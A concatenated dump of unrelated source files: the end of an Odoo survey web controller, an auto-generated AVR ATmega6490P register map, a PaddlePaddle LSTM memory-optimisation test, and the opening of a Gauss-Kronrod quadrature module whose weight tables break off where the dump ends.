user_input_line_obj.save_lines(cr, uid, user_input_id, question, post, answer_tag, context=context)
user_input = user_input_obj.browse(cr, uid, user_input_id, context=context)
go_back = post['button_submit'] == 'previous'
next_page, _, last = survey_obj.next_page(cr, uid, user_input, page_id, go_back=go_back, context=context)
vals = {'last_displayed_page_id': page_id}
if next_page is None and not go_back:
vals.update({'state': 'done'})
else:
vals.update({'state': 'skip'})
user_input_obj.write(cr, uid, user_input_id, vals, context=context)
ret['redirect'] = '/survey/fill/%s/%s' % (survey.id, post['token'])
if go_back:
ret['redirect'] += '/prev'
return json.dumps(ret)
# Printing routes
@http.route(['/survey/print/<model("survey.survey"):survey>',
'/survey/print/<model("survey.survey"):survey>/<string:token>'],
type='http', auth='public', website=True)
def print_survey(self, survey, token=None, **post):
'''Display an survey in printable view; if <token> is set, it will
grab the answers of the user_input_id that has <token>.'''
return request.website.render('survey.survey_print',
{'survey': survey,
'token': token,
'page_nr': 0,
'quizz_correction': True if survey.quizz_mode and token else False})
@http.route(['/survey/results/<model("survey.survey"):survey>'],
type='http', auth='user', website=True)
def survey_reporting(self, survey, token=None, **post):
'''Display survey Results & Statistics for given survey.'''
result_template, current_filters, filter_display_data, filter_finish = 'survey.result', [], [], False
survey_obj = request.registry['survey.survey']
if not survey.user_input_ids or not [input_id.id for input_id in survey.user_input_ids if input_id.state != 'new']:
result_template = 'survey.no_result'
if 'finished' in post:
post.pop('finished')
filter_finish = True
if post or filter_finish:
filter_data = self.get_filter_data(post)
current_filters = survey_obj.filter_input_ids(request.cr, request.uid, filter_data, filter_finish, context=request.context)
filter_display_data = survey_obj.get_filter_display_data(request.cr, request.uid, filter_data, context=request.context)
return request.website.render(result_template,
{'survey': survey,
'survey_dict': self.prepare_result_dict(survey, current_filters),
'page_range': self.page_range,
'current_filters': current_filters,
'filter_display_data': filter_display_data,
'filter_finish': filter_finish
})
def prepare_result_dict(self,survey, current_filters=[]):
"""Returns dictionary having values for rendering template"""
survey_obj = request.registry['survey.survey']
result = {'survey':survey, 'page_ids': []}
for page in survey.page_ids:
page_dict = {'page': page, 'question_ids': []}
for question in page.question_ids:
question_dict = {'question':question, 'input_summary':survey_obj.get_input_summary(request.cr, request.uid, question, current_filters, context=request.context), 'prepare_result':survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context), 'graph_data': self.get_graph_data(question, current_filters)}
page_dict['question_ids'].append(question_dict)
result['page_ids'].append(page_dict)
return result
def get_filter_data(self, post):
"""Returns data used for filtering the result"""
filters = []
for ids in post:
#if user add some random data in query URI, ignore it
try:
row_id, answer_id = ids.split(',')
filters.append({'row_id': int(row_id), 'answer_id': int(answer_id)})
except:
return filters
return filters
def page_range(self, total_record, limit):
'''Returns number of pages required for pagination'''
total = ceil(total_record / float(limit))
return range(1, int(total + 1))
def get_graph_data(self, question, current_filters=[]):
'''Returns formatted data required by graph library on basis of filter'''
survey_obj = request.registry['survey.survey']
result = []
if question.type == 'multiple_choice':
result.append({'key': str(question.question),
'values': survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context)})
if question.type == 'simple_choice':
result = survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context)
if question.type == 'matrix':
data = survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context)
for answer in data['answers']:
values = []
for res in data['result']:
if res[1] == answer:
values.append({'text': data['rows'][res[0]], 'count': data['result'][res]})
result.append({'key': data['answers'].get(answer), 'values': values})
return json.dumps(result)
def dict_soft_update(dictionary, key, value):
''' Insert the pair <key>: <value> into the <dictionary>. If <key> is
already present, this function will append <value> to the list of
existing data (instead of erasing it) '''
if key in dictionary:
dictionary[key].append(value)
else:
dictionary.update({key: [value]})
| agpl-3.0 | 395,027,819,287,855,700 | 49.781915 | 359 | 0.585786 | false |
andrewtholt/My-amforth-6.1 | avr8/devices/atmega6490p/device.py | 5 | 6779 | # Partname: ATmega6490P
# generated automatically, do not edit
MCUREGS = {
'ADMUX': '&124',
'ADMUX_REFS': '$C0',
'ADMUX_ADLAR': '$20',
'ADMUX_MUX': '$1F',
'ADCSRA': '&122',
'ADCSRA_ADEN': '$80',
'ADCSRA_ADSC': '$40',
'ADCSRA_ADATE': '$20',
'ADCSRA_ADIF': '$10',
'ADCSRA_ADIE': '$08',
'ADCSRA_ADPS': '$07',
'ADC': '&120',
'ADCSRB': '&123',
'ADCSRB_ADTS': '$07',
'DIDR0': '&126',
'DIDR0_ADC7D': '$80',
'DIDR0_ADC6D': '$40',
'DIDR0_ADC5D': '$20',
'DIDR0_ADC4D': '$10',
'DIDR0_ADC3D': '$08',
'DIDR0_ADC2D': '$04',
'DIDR0_ADC1D': '$02',
'DIDR0_ADC0D': '$01',
'ACSR': '&80',
'ACSR_ACD': '$80',
'ACSR_ACBG': '$40',
'ACSR_ACO': '$20',
'ACSR_ACI': '$10',
'ACSR_ACIE': '$08',
'ACSR_ACIC': '$04',
'ACSR_ACIS': '$03',
'DIDR1': '&127',
'DIDR1_AIN1D': '$02',
'DIDR1_AIN0D': '$01',
'SPCR': '&76',
'SPCR_SPIE': '$80',
'SPCR_SPE': '$40',
'SPCR_DORD': '$20',
'SPCR_MSTR': '$10',
'SPCR_CPOL': '$08',
'SPCR_CPHA': '$04',
'SPCR_SPR': '$03',
'SPSR': '&77',
'SPSR_SPIF': '$80',
'SPSR_WCOL': '$40',
'SPSR_SPI2X': '$01',
'SPDR': '&78',
'USIDR': '&186',
'USISR': '&185',
'USISR_USISIF': '$80',
'USISR_USIOIF': '$40',
'USISR_USIPF': '$20',
'USISR_USIDC': '$10',
'USISR_USICNT': '$0F',
'USICR': '&184',
'USICR_USISIE': '$80',
'USICR_USIOIE': '$40',
'USICR_USIWM': '$30',
'USICR_USICS': '$0C',
'USICR_USICLK': '$02',
'USICR_USITC': '$01',
'UDR0': '&198',
'UCSR0A': '&192',
'UCSR0A_RXC0': '$80',
'UCSR0A_TXC0': '$40',
'UCSR0A_UDRE0': '$20',
'UCSR0A_FE0': '$10',
'UCSR0A_DOR0': '$08',
'UCSR0A_UPE0': '$04',
'UCSR0A_U2X0': '$02',
'UCSR0A_MPCM0': '$01',
'UCSR0B': '&193',
'UCSR0B_RXCIE0': '$80',
'UCSR0B_TXCIE0': '$40',
'UCSR0B_UDRIE0': '$20',
'UCSR0B_RXEN0': '$10',
'UCSR0B_TXEN0': '$08',
'UCSR0B_UCSZ02': '$04',
'UCSR0B_RXB80': '$02',
'UCSR0B_TXB80': '$01',
'UCSR0C': '&194',
'UCSR0C_UMSEL0': '$40',
'UCSR0C_UPM0': '$30',
'UCSR0C_USBS0': '$08',
'UCSR0C_UCSZ0': '$06',
'UCSR0C_UCPOL0': '$01',
'UBRR0': '&196',
'SREG': '&95',
'SREG_I': '$80',
'SREG_T': '$40',
'SREG_H': '$20',
'SREG_S': '$10',
'SREG_V': '$08',
'SREG_N': '$04',
'SREG_Z': '$02',
'SREG_C': '$01',
'SP': '&93',
'MCUCR': '&85',
'MCUCR_PUD': '$10',
'MCUCR_IVSEL': '$02',
'MCUCR_IVCE': '$01',
'MCUSR': '&84',
'MCUSR_JTRF': '$10',
'MCUSR_WDRF': '$08',
'MCUSR_BORF': '$04',
'MCUSR_EXTRF': '$02',
'MCUSR_PORF': '$01',
'OSCCAL': '&102',
'CLKPR': '&97',
'CLKPR_CLKPCE': '$80',
'CLKPR_CLKPS': '$0F',
'PRR': '&100',
'PRR_PRLCD': '$10',
'PRR_PRTIM1': '$08',
'PRR_PRSPI': '$04',
'PRR_PRUSART0': '$02',
'PRR_PRADC': '$01',
'SMCR': '&83',
'SMCR_SM': '$0E',
'SMCR_SE': '$01',
'GPIOR2': '&75',
'GPIOR1': '&74',
'GPIOR0': '&62',
'OCDR': '&81',
'EEAR': '&65',
'EEDR': '&64',
'EECR': '&63',
'EECR_EERIE': '$08',
'EECR_EEMWE': '$04',
'EECR_EEWE': '$02',
'EECR_EERE': '$01',
'PORTA': '&34',
'DDRA': '&33',
'PINA': '&32',
'PORTB': '&37',
'DDRB': '&36',
'PINB': '&35',
'PORTC': '&40',
'DDRC': '&39',
'PINC': '&38',
'PORTD': '&43',
'DDRD': '&42',
'PIND': '&41',
'PORTE': '&46',
'DDRE': '&45',
'PINE': '&44',
'PORTF': '&49',
'DDRF': '&48',
'PINF': '&47',
'PORTG': '&52',
'DDRG': '&51',
'PING': '&50',
'TCCR0A': '&68',
'TCCR0A_FOC0A': '$80',
'TCCR0A_WGM00': '$40',
'TCCR0A_COM0A': '$30',
'TCCR0A_WGM01': '$08',
'TCCR0A_CS0': '$07',
'TCNT0': '&70',
'OCR0A': '&71',
'TIMSK0': '&110',
'TIMSK0_OCIE0A': '$02',
'TIMSK0_TOIE0': '$01',
'TIFR0': '&53',
'TIFR0_OCF0A': '$02',
'TIFR0_TOV0': '$01',
'GTCCR': '&67',
'GTCCR_TSM': '$80',
'GTCCR_PSR310': '$01',
'TCCR1A': '&128',
'TCCR1A_COM1A': '$C0',
'TCCR1A_COM1B': '$30',
'TCCR1A_WGM1': '$03',
'TCCR1B': '&129',
'TCCR1B_ICNC1': '$80',
'TCCR1B_ICES1': '$40',
'TCCR1B_WGM1': '$18',
'TCCR1B_CS1': '$07',
'TCCR1C': '&130',
'TCCR1C_FOC1A': '$80',
'TCCR1C_FOC1B': '$40',
'TCNT1': '&132',
'OCR1A': '&136',
'OCR1B': '&138',
'ICR1': '&134',
'TIMSK1': '&111',
'TIMSK1_ICIE1': '$20',
'TIMSK1_OCIE1B': '$04',
'TIMSK1_OCIE1A': '$02',
'TIMSK1_TOIE1': '$01',
'TIFR1': '&54',
'TIFR1_ICF1': '$20',
'TIFR1_OCF1B': '$04',
'TIFR1_OCF1A': '$02',
'TIFR1_TOV1': '$01',
'TCCR2A': '&176',
'TCCR2A_FOC2A': '$80',
'TCCR2A_WGM20': '$40',
'TCCR2A_COM2A': '$30',
'TCCR2A_WGM21': '$08',
'TCCR2A_CS2': '$07',
'TCNT2': '&178',
'OCR2A': '&179',
'TIMSK2': '&112',
'TIMSK2_OCIE2A': '$02',
'TIMSK2_TOIE2': '$01',
'TIFR2': '&55',
'TIFR2_OCF2A': '$02',
'TIFR2_TOV2': '$01',
'ASSR': '&182',
'ASSR_EXCLK': '$10',
'ASSR_AS2': '$08',
'ASSR_TCN2UB': '$04',
'ASSR_OCR2UB': '$02',
'ASSR_TCR2UB': '$01',
'WDTCR': '&96',
'WDTCR_WDCE': '$10',
'WDTCR_WDE': '$08',
'WDTCR_WDP': '$07',
'SPMCSR': '&87',
'SPMCSR_SPMIE': '$80',
'SPMCSR_RWWSB': '$40',
'SPMCSR_RWWSRE': '$10',
'SPMCSR_BLBSET': '$08',
'SPMCSR_PGWRT': '$04',
'SPMCSR_PGERS': '$02',
'SPMCSR_SPMEN': '$01',
'PORTH': '&218',
'DDRH': '&217',
'PINH': '&216',
'PORTJ': '&221',
'DDRJ': '&220',
'PINJ': '&219',
'LCDDR19': '&255',
'LCDDR18': '&254',
'LCDDR17': '&253',
'LCDDR16': '&252',
'LCDDR15': '&251',
'LCDDR14': '&250',
'LCDDR13': '&249',
'LCDDR12': '&248',
'LCDDR11': '&247',
'LCDDR10': '&246',
'LCDDR9': '&245',
'LCDDR8': '&244',
'LCDDR7': '&243',
'LCDDR6': '&242',
'LCDDR5': '&241',
'LCDDR4': '&240',
'LCDDR3': '&239',
'LCDDR2': '&238',
'LCDDR1': '&237',
'LCDDR0': '&236',
'LCDCCR': '&231',
'LCDFRR': '&230',
'LCDFRR_LCDPS': '$70',
'LCDFRR_LCDCD': '$07',
'LCDCRB': '&229',
'LCDCRB_LCDCS': '$80',
'LCDCRB_LCD2B': '$40',
'LCDCRB_LCDMUX': '$30',
'LCDCRB_LCDPM': '$0F',
'LCDCRA': '&228',
'LCDCRA_LCDEN': '$80',
'LCDCRA_LCDAB': '$40',
'LCDCRA_LCDIF': '$10',
'LCDCRA_LCDIE': '$08',
'LCDCRA_LCDBL': '$01',
'EICRA': '&105',
'EICRA_ISC01': '$02',
'EICRA_ISC00': '$01',
'EIMSK': '&61',
'EIMSK_PCIE': '$F0',
'EIMSK_INT0': '$01',
'EIFR': '&60',
'EIFR_PCIF': '$F0',
'EIFR_INTF0': '$01',
'PCMSK3': '&115',
'PCMSK2': '&109',
'PCMSK1': '&108',
'PCMSK0': '&107',
'INT0Addr': '2',
'PCINT0Addr': '4',
'PCINT1Addr': '6',
'TIMER2_COMPAddr': '8',
'TIMER2_OVFAddr': '10',
'TIMER1_CAPTAddr': '12',
'TIMER1_COMPAAddr': '14',
'TIMER1_COMPBAddr': '16',
'TIMER1_OVFAddr': '18',
'TIMER0_COMPAddr': '20',
'TIMER0_OVFAddr': '22',
'SPI__STCAddr': '24',
'USART__RXAddr': '26',
'USART__UDREAddr': '28',
'USART0__TXAddr': '30',
'USI_STARTAddr': '32',
'USI_OVERFLOWAddr': '34',
'ANALOG_COMPAddr': '36',
'ADCAddr': '38',
'EE_READYAddr': '40',
'SPM_READYAddr': '42',
'LCDAddr': '44',
'PCINT2Addr': '46',
'PCINT3Addr': '48'
} | gpl-3.0 | -9,155,134,705,224,719,000 | 20.941748 | 38 | 0.473816 | false |
baidu/Paddle | python/paddle/fluid/tests/unittests/test_ir_memory_optimize_nlp.py | 5 | 1878 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# nlp model stack of op operate on lod. It's a classical test case in optimize pass.
from __future__ import print_function
import paddle.fluid as fluid
import unittest
from ir_memory_optimize_net_base import TestIrMemOptBase
def lstm_net(data,
label,
dict_dim,
emb_dim=128,
hid_dim=128,
hid_dim2=96,
class_dim=2,
emb_lr=30.0):
emb = fluid.layers.embedding(
input=data,
size=[dict_dim, emb_dim],
param_attr=fluid.ParamAttr(learning_rate=emb_lr))
fc0 = fluid.layers.fc(input=emb, size=hid_dim * 4)
lstm_h, c = fluid.layers.dynamic_lstm(
input=fc0, size=hid_dim * 4, is_reverse=False)
lstm_max = fluid.layers.sequence_pool(input=lstm_h, pool_type='max')
lstm_max_tanh = fluid.layers.tanh(lstm_max)
fc1 = fluid.layers.fc(input=lstm_max_tanh, size=hid_dim2, act='tanh')
prediction = fluid.layers.fc(input=fc1, size=class_dim, act='softmax')
cost = fluid.layers.cross_entropy(input=prediction, label=label)
avg_cost = fluid.layers.mean(x=cost)
return avg_cost
class TestIrMemOptRNN(TestIrMemOptBase):
def setUp(self):
self.network = lstm_net
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -2,888,267,745,529,861,600 | 33.145455 | 84 | 0.675186 | false |
rtrwalker/geotecha | geotecha/mathematics/quadrature.py | 1 | 74253 | # geotecha - A software suite for geotechncial engineering
# Copyright (C) 2018 Rohan T. Walker ([email protected])
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/gpl.html.
"""Numerical integration by quadrature"""
from __future__ import division, print_function
import matplotlib.pyplot
import numpy as np
from scipy import integrate
from scipy.special import jn_zeros
from scipy.special import jn
from matplotlib import pyplot as plt
import functools
import unittest
from numpy.testing import assert_allclose
from numpy.polynomial.polynomial import Polynomial
def gauss_kronrod_abscissae_and_weights(n):
"""Gauss-Kronrod quadrature abscissae and weights
Coarse integral = Sum(f(xi) * wi1)
Fine integral = Sum(f(xi) * wi2)
For the coarse integral the unused weights are set to zero
Parameters
----------
n : [2-20, 32, 64, 100]
number of integration points for the Gauss points. Number of Kronrod
points will automatically be 2 * n + 1.
Returns
-------
xi : 1d array
Abscissae for the quadrature points.
wi1 : 1d array
Weights for the coarse integral.
wi2 : 1d array
Weights for the fine integral
References
----------
.. [2] Holoborodko, Pavel. 2011. 'Gauss-Kronrod Quadrature Nodes and
Weights. November 7.
http://www.advanpix.com/2011/11/07/gauss-kronrod-quadrature-nodes-weights/#Tabulated_Gauss-Kronrod_weights_and_abscissae
"""
if n not in [7,10,15,20,25,30]:
raise ValueError('n must be 2-20, 32, 64, or 100')
weights = {
7: {
'g': np.array(
[[-0.9491079123427585245261897, 0.1294849661688696932706114],
[ -0.7415311855993944398638648, 0.2797053914892766679014678],
[ -0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0.0000000000000000000000000, 0.4179591836734693877551020],
[ 0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0.7415311855993944398638648, 0.2797053914892766679014678],
[ 0.9491079123427585245261897, 0.1294849661688696932706114]],
dtype=float),
'k': np.array(
[[-0.9914553711208126392068547, 0.0229353220105292249637320],
[ -0.9491079123427585245261897, 0.0630920926299785532907007],
[ -0.8648644233597690727897128, 0.1047900103222501838398763],
[ -0.7415311855993944398638648, 0.1406532597155259187451896],
[ -0.5860872354676911302941448, 0.1690047266392679028265834],
[ -0.4058451513773971669066064, 0.1903505780647854099132564],
[ -0.2077849550078984676006894, 0.2044329400752988924141620],
[ 0.0000000000000000000000000, 0.2094821410847278280129992],
[ 0.2077849550078984676006894, 0.2044329400752988924141620],
[ 0.4058451513773971669066064, 0.1903505780647854099132564],
[ 0.5860872354676911302941448, 0.1690047266392679028265834],
[ 0.7415311855993944398638648, 0.1406532597155259187451896],
[ 0.8648644233597690727897128, 0.1047900103222501838398763],
[ 0.9491079123427585245261897, 0.0630920926299785532907007],
[ 0.9914553711208126392068547, 0.0229353220105292249637320]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False], dtype=bool)
},
10: {
'g': np.array(
[[-0.9739065285171717200779640, 0.0666713443086881375935688],
[ -0.8650633666889845107320967, 0.1494513491505805931457763],
[ -0.6794095682990244062343274, 0.2190863625159820439955349],
[ -0.4333953941292471907992659, 0.2692667193099963550912269],
[ -0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.4333953941292471907992659, 0.2692667193099963550912269],
[ 0.6794095682990244062343274, 0.2190863625159820439955349],
[ 0.8650633666889845107320967, 0.1494513491505805931457763],
[ 0.9739065285171717200779640, 0.0666713443086881375935688]],
dtype=float),
'k': np.array(
[[-0.9956571630258080807355273, 0.0116946388673718742780644],
[ -0.9739065285171717200779640, 0.0325581623079647274788190],
[ -0.9301574913557082260012072, 0.0547558965743519960313813],
[ -0.8650633666889845107320967, 0.0750396748109199527670431],
[ -0.7808177265864168970637176, 0.0931254545836976055350655],
[ -0.6794095682990244062343274, 0.1093871588022976418992106],
[ -0.5627571346686046833390001, 0.1234919762620658510779581],
[ -0.4333953941292471907992659, 0.1347092173114733259280540],
[ -0.2943928627014601981311266, 0.1427759385770600807970943],
[ -0.1488743389816312108848260, 0.1477391049013384913748415],
[ 0.0000000000000000000000000, 0.1494455540029169056649365],
[ 0.1488743389816312108848260, 0.1477391049013384913748415],
[ 0.2943928627014601981311266, 0.1427759385770600807970943],
[ 0.4333953941292471907992659, 0.1347092173114733259280540],
[ 0.5627571346686046833390001, 0.1234919762620658510779581],
[ 0.6794095682990244062343274, 0.1093871588022976418992106],
[ 0.7808177265864168970637176, 0.0931254545836976055350655],
[ 0.8650633666889845107320967, 0.0750396748109199527670431],
[ 0.9301574913557082260012072, 0.0547558965743519960313813],
[ 0.9739065285171717200779640, 0.0325581623079647274788190],
[ 0.9956571630258080807355273, 0.0116946388673718742780644]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False], dtype=bool)
},
15: {
'g': np.array(
[[-0.9879925180204854284895657, 0.0307532419961172683546284],
[ -0.9372733924007059043077589, 0.0703660474881081247092674],
[ -0.8482065834104272162006483, 0.1071592204671719350118695],
[ -0.7244177313601700474161861, 0.1395706779261543144478048],
[ -0.5709721726085388475372267, 0.1662692058169939335532009],
[ -0.3941513470775633698972074, 0.1861610000155622110268006],
[ -0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0.0000000000000000000000000, 0.2025782419255612728806202],
[ 0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0.3941513470775633698972074, 0.1861610000155622110268006],
[ 0.5709721726085388475372267, 0.1662692058169939335532009],
[ 0.7244177313601700474161861, 0.1395706779261543144478048],
[ 0.8482065834104272162006483, 0.1071592204671719350118695],
[ 0.9372733924007059043077589, 0.0703660474881081247092674],
[ 0.9879925180204854284895657, 0.0307532419961172683546284]],
dtype=float),
'k': np.array(
[[-0.9980022986933970602851728, 0.0053774798729233489877921],
[ -0.9879925180204854284895657, 0.0150079473293161225383748],
[ -0.9677390756791391342573480, 0.0254608473267153201868740],
[ -0.9372733924007059043077589, 0.0353463607913758462220379],
[ -0.8972645323440819008825097, 0.0445897513247648766082273],
[ -0.8482065834104272162006483, 0.0534815246909280872653431],
[ -0.7904185014424659329676493, 0.0620095678006706402851392],
[ -0.7244177313601700474161861, 0.0698541213187282587095201],
[ -0.6509967412974169705337359, 0.0768496807577203788944328],
[ -0.5709721726085388475372267, 0.0830805028231330210382892],
[ -0.4850818636402396806936557, 0.0885644430562117706472754],
[ -0.3941513470775633698972074, 0.0931265981708253212254869],
[ -0.2991800071531688121667800, 0.0966427269836236785051799],
[ -0.2011940939974345223006283, 0.0991735987217919593323932],
[ -0.1011420669187174990270742, 0.1007698455238755950449467],
[ 0.0000000000000000000000000, 0.1013300070147915490173748],
[ 0.1011420669187174990270742, 0.1007698455238755950449467],
[ 0.2011940939974345223006283, 0.0991735987217919593323932],
[ 0.2991800071531688121667800, 0.0966427269836236785051799],
[ 0.3941513470775633698972074, 0.0931265981708253212254869],
[ 0.4850818636402396806936557, 0.0885644430562117706472754],
[ 0.5709721726085388475372267, 0.0830805028231330210382892],
[ 0.6509967412974169705337359, 0.0768496807577203788944328],
[ 0.7244177313601700474161861, 0.0698541213187282587095201],
[ 0.7904185014424659329676493, 0.0620095678006706402851392],
[ 0.8482065834104272162006483, 0.0534815246909280872653431],
[ 0.8972645323440819008825097, 0.0445897513247648766082273],
[ 0.9372733924007059043077589, 0.0353463607913758462220379],
[ 0.9677390756791391342573480, 0.0254608473267153201868740],
[ 0.9879925180204854284895657, 0.0150079473293161225383748],
[ 0.9980022986933970602851728, 0.0053774798729233489877921]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False], dtype=bool)
},
20: {
'g': np.array(
[[-0.9931285991850949247861224, 0.0176140071391521183118620],
[ -0.9639719272779137912676661, 0.0406014298003869413310400],
[ -0.9122344282513259058677524, 0.0626720483341090635695065],
[ -0.8391169718222188233945291, 0.0832767415767047487247581],
[ -0.7463319064601507926143051, 0.1019301198172404350367501],
[ -0.6360536807265150254528367, 0.1181945319615184173123774],
[ -0.5108670019508270980043641, 0.1316886384491766268984945],
[ -0.3737060887154195606725482, 0.1420961093183820513292983],
[ -0.2277858511416450780804962, 0.1491729864726037467878287],
[ -0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.2277858511416450780804962, 0.1491729864726037467878287],
[ 0.3737060887154195606725482, 0.1420961093183820513292983],
[ 0.5108670019508270980043641, 0.1316886384491766268984945],
[ 0.6360536807265150254528367, 0.1181945319615184173123774],
[ 0.7463319064601507926143051, 0.1019301198172404350367501],
[ 0.8391169718222188233945291, 0.0832767415767047487247581],
[ 0.9122344282513259058677524, 0.0626720483341090635695065],
[ 0.9639719272779137912676661, 0.0406014298003869413310400],
[ 0.9931285991850949247861224, 0.0176140071391521183118620]],
dtype=float),
'k': np.array(
[[-0.9988590315882776638383156, 0.0030735837185205315012183],
[ -0.9931285991850949247861224, 0.0086002698556429421986618],
[ -0.9815078774502502591933430, 0.0146261692569712529837880],
[ -0.9639719272779137912676661, 0.0203883734612665235980102],
[ -0.9408226338317547535199827, 0.0258821336049511588345051],
[ -0.9122344282513259058677524, 0.0312873067770327989585431],
[ -0.8782768112522819760774430, 0.0366001697582007980305572],
[ -0.8391169718222188233945291, 0.0416688733279736862637883],
[ -0.7950414288375511983506388, 0.0464348218674976747202319],
[ -0.7463319064601507926143051, 0.0509445739237286919327077],
[ -0.6932376563347513848054907, 0.0551951053482859947448324],
[ -0.6360536807265150254528367, 0.0591114008806395723749672],
[ -0.5751404468197103153429460, 0.0626532375547811680258701],
[ -0.5108670019508270980043641, 0.0658345971336184221115636],
[ -0.4435931752387251031999922, 0.0686486729285216193456234],
[ -0.3737060887154195606725482, 0.0710544235534440683057904],
[ -0.3016278681149130043205554, 0.0730306903327866674951894],
[ -0.2277858511416450780804962, 0.0745828754004991889865814],
[ -0.1526054652409226755052202, 0.0757044976845566746595428],
[ -0.0765265211334973337546404, 0.0763778676720807367055028],
[ 0.0000000000000000000000000, 0.0766007119179996564450499],
[ 0.0765265211334973337546404, 0.0763778676720807367055028],
[ 0.1526054652409226755052202, 0.0757044976845566746595428],
[ 0.2277858511416450780804962, 0.0745828754004991889865814],
[ 0.3016278681149130043205554, 0.0730306903327866674951894],
[ 0.3737060887154195606725482, 0.0710544235534440683057904],
[ 0.4435931752387251031999922, 0.0686486729285216193456234],
[ 0.5108670019508270980043641, 0.0658345971336184221115636],
[ 0.5751404468197103153429460, 0.0626532375547811680258701],
[ 0.6360536807265150254528367, 0.0591114008806395723749672],
[ 0.6932376563347513848054907, 0.0551951053482859947448324],
[ 0.7463319064601507926143051, 0.0509445739237286919327077],
[ 0.7950414288375511983506388, 0.0464348218674976747202319],
[ 0.8391169718222188233945291, 0.0416688733279736862637883],
[ 0.8782768112522819760774430, 0.0366001697582007980305572],
[ 0.9122344282513259058677524, 0.0312873067770327989585431],
[ 0.9408226338317547535199827, 0.0258821336049511588345051],
[ 0.9639719272779137912676661, 0.0203883734612665235980102],
[ 0.9815078774502502591933430, 0.0146261692569712529837880],
[ 0.9931285991850949247861224, 0.0086002698556429421986618],
[ 0.9988590315882776638383156, 0.0030735837185205315012183]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False], dtype=bool)
},
25: {
'g': np.array(
[[-0.9955569697904980979087849, 0.0113937985010262879479030],
[ -0.9766639214595175114983154, 0.0263549866150321372619018],
[ -0.9429745712289743394140112, 0.0409391567013063126556235],
[ -0.8949919978782753688510420, 0.0549046959758351919259369],
[ -0.8334426287608340014210211, 0.0680383338123569172071872],
[ -0.7592592630373576305772829, 0.0801407003350010180132350],
[ -0.6735663684734683644851206, 0.0910282619829636498114972],
[ -0.5776629302412229677236898, 0.1005359490670506442022069],
[ -0.4730027314457149605221821, 0.1085196244742636531160940],
[ -0.3611723058093878377358217, 0.1148582591457116483393255],
[ -0.2438668837209884320451904, 0.1194557635357847722281781],
[ -0.1228646926107103963873598, 0.1222424429903100416889595],
[ 0.0000000000000000000000000, 0.1231760537267154512039029],
[ 0.1228646926107103963873598, 0.1222424429903100416889595],
[ 0.2438668837209884320451904, 0.1194557635357847722281781],
[ 0.3611723058093878377358217, 0.1148582591457116483393255],
[ 0.4730027314457149605221821, 0.1085196244742636531160940],
[ 0.5776629302412229677236898, 0.1005359490670506442022069],
[ 0.6735663684734683644851206, 0.0910282619829636498114972],
[ 0.7592592630373576305772829, 0.0801407003350010180132350],
[ 0.8334426287608340014210211, 0.0680383338123569172071872],
[ 0.8949919978782753688510420, 0.0549046959758351919259369],
[ 0.9429745712289743394140112, 0.0409391567013063126556235],
[ 0.9766639214595175114983154, 0.0263549866150321372619018],
[ 0.9955569697904980979087849, 0.0113937985010262879479030]],
dtype=float),
'k': np.array(
[[-0.9992621049926098341934575, 0.0019873838923303159265079],
[ -0.9955569697904980979087849, 0.0055619321353567137580402],
[ -0.9880357945340772476373310, 0.0094739733861741516072077],
[ -0.9766639214595175114983154, 0.0132362291955716748136564],
[ -0.9616149864258425124181300, 0.0168478177091282982315167],
[ -0.9429745712289743394140112, 0.0204353711458828354565683],
[ -0.9207471152817015617463461, 0.0240099456069532162200925],
[ -0.8949919978782753688510420, 0.0274753175878517378029485],
[ -0.8658470652932755954489970, 0.0307923001673874888911090],
[ -0.8334426287608340014210211, 0.0340021302743293378367488],
[ -0.7978737979985000594104109, 0.0371162714834155435603306],
[ -0.7592592630373576305772829, 0.0400838255040323820748393],
[ -0.7177664068130843881866541, 0.0428728450201700494768958],
[ -0.6735663684734683644851206, 0.0455029130499217889098706],
[ -0.6268100990103174127881227, 0.0479825371388367139063923],
[ -0.5776629302412229677236898, 0.0502776790807156719633253],
[ -0.5263252843347191825996238, 0.0523628858064074758643667],
[ -0.4730027314457149605221821, 0.0542511298885454901445434],
[ -0.4178853821930377488518144, 0.0559508112204123173082407],
[ -0.3611723058093878377358217, 0.0574371163615678328535827],
[ -0.3030895389311078301674789, 0.0586896800223942079619742],
[ -0.2438668837209884320451904, 0.0597203403241740599790993],
[ -0.1837189394210488920159699, 0.0605394553760458629453603],
[ -0.1228646926107103963873598, 0.0611285097170530483058590],
[ -0.0615444830056850788865464, 0.0614711898714253166615441],
